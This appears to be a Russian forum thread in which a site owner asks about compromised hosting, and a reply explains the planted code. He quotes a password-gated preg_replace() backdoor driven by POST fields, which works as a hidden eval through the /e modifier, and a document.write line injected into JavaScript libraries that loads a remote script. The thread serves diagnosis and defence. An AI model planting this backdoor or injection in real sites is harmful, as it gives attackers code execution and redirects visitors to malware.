preg_replace() и $_POST, есть ли тут дыра в безопасности?

@kester · Регистрация: 11.05.2010

Студворк — интернет-сервис помощи студентам

Вот о чём речь:
В некоторых местах на хостинге появились файлы с содержимым:

PHP
1
2
3
4
<?php
if (md5($_POST['p']) == '227632b72cb3d5d1b86d25ab190c0a88') {
    preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}

Также к ним время от времени идёт обращение извне злоумышленником.

Кроме того, регулярно появляются в js библиотеках(типа jquery) в конце запись, типа такой:

JavaScript
1
;document.write("<scr"+"ipt src='mysite.com/[some_address]/[some_file].js'><"+"/script>");

Ну и, понятное дело, из-за этого [some_file].js меня блочит яндекс. (Troj/JSRedir-MN)

Вопрос в том, что же такого страшного написано в php-файле и может ли это быть связано с проблемой с js?

(что такое preg_replace я вкурсе, но вот почему он тут не пойму)
PHP 5.3
сайт на Joomla!1.5

Vovan-VE · 24.12.2013, 14:52

Вторая строка кода — проверка пароля, который был отправлен в POST[p].
Третья строка — это по существу скрытый eval(POST[v2]).

Это бекдор, позволяющий выполнить любой код.

@kester · 24.12.2013, 17:31 **[ТС]**

Сообщение от Vovan-VE

Третья строка — это по существу скрытый eval(POST[v2]).

А вот тут поподробнее, пожалуйста.
Уже не первый раз встречаю "нехороший код" с preg_replace(), но не совсем понимаю, каким образом он превращается в eval.

Добавлено через 23 минуты
Всё, понял/нашел. Всё дело в "/e" в конце.
Кому интересно, "небезопасные" функции в php.

Новые блоги и статьи Все статьи Все блоги /
SDL3 для Web (WebAssembly): Работа со звуком через SDL3_mixer 8Observer8 08.02.2026 Содержание блога Пошагово создадим проект для загрузки звукового файла и воспроизведения звука с помощью библиотеки SDL3_mixer. Звук будет воспроизводиться по клику мышки по холсту на Desktop и по. . .	SDL3 для Web (WebAssembly): Основы отладки веб-приложений на SDL3 по USB и Wi-Fi, запущенных в браузере мобильных устройств 8Observer8 07.02.2026 Содержание блога Браузер Chrome имеет средства для отладки мобильных веб-приложений по USB. В этой пошаговой инструкции ограничимся работой с консолью. Вывод в консоль - это часть процесса. . .	SDL3 для Web (WebAssembly): Обработчик клика мыши в браузере ПК и касания экрана в браузере на мобильном устройстве 8Observer8 02.02.2026 Содержание блога Для начала пошагово создадим рабочий пример для подготовки к экспериментам в браузере ПК и в браузере мобильного устройства. Потом напишем обработчик клика мыши и обработчик. . .	Философия технологии iceja 01.02.2026 На мой взгляд у человека в технических проектах остается роль генерального директора. Все остальное нейронки делают уже лучше человека. Они не могут нести предпринимательские риски, не могут. . .
SDL3 для Web (WebAssembly): Вывод текста со шрифтом TTF с помощью SDL3_ttf 8Observer8 01.02.2026 Содержание блога В этой пошаговой инструкции создадим с нуля веб-приложение, которое выводит текст в окне браузера. Запустим на Android на локальном сервере. Загрузим Release на бесплатный. . .	SDL3 для Web (WebAssembly): Сборка C/C++ проекта из консоли 8Observer8 30.01.2026 Содержание блога Если вы откроете примеры для начинающих на официальном репозитории SDL3 в папке: examples, то вы увидите, что все примеры используют следующие четыре обязательные функции, а. . .	SDL3 для Web (WebAssembly): Установка Emscripten SDK (emsdk) и CMake для сборки C и C++ приложений в Wasm 8Observer8 30.01.2026 Содержание блога Для того чтобы скачать Emscripten SDK (emsdk) необходимо сначало скачать и уставить Git: Install for Windows. Следуйте стандартной процедуре установки Git через установщик. . . .	SDL3 для Android: Подключение Box2D v3, физика и отрисовка коллайдеров 8Observer8 29.01.2026 Содержание блога Box2D - это библиотека для 2D физики для анимаций и игр. С её помощью можно определять были ли коллизии между конкретными объектами. Версия v3 была полностью переписана на Си, в. . .

Vovan-VE 13210 / 6599 / 1041 Регистрация: 10.01.2008 Сообщений: 15,069
	24.12.2013, 14:52
	Вторая строка кода — проверка пароля, который был отправлен в POST[p]. Третья строка — это по существу скрытый eval(POST[v2]). Это бекдор, позволяющий выполнить любой код. 1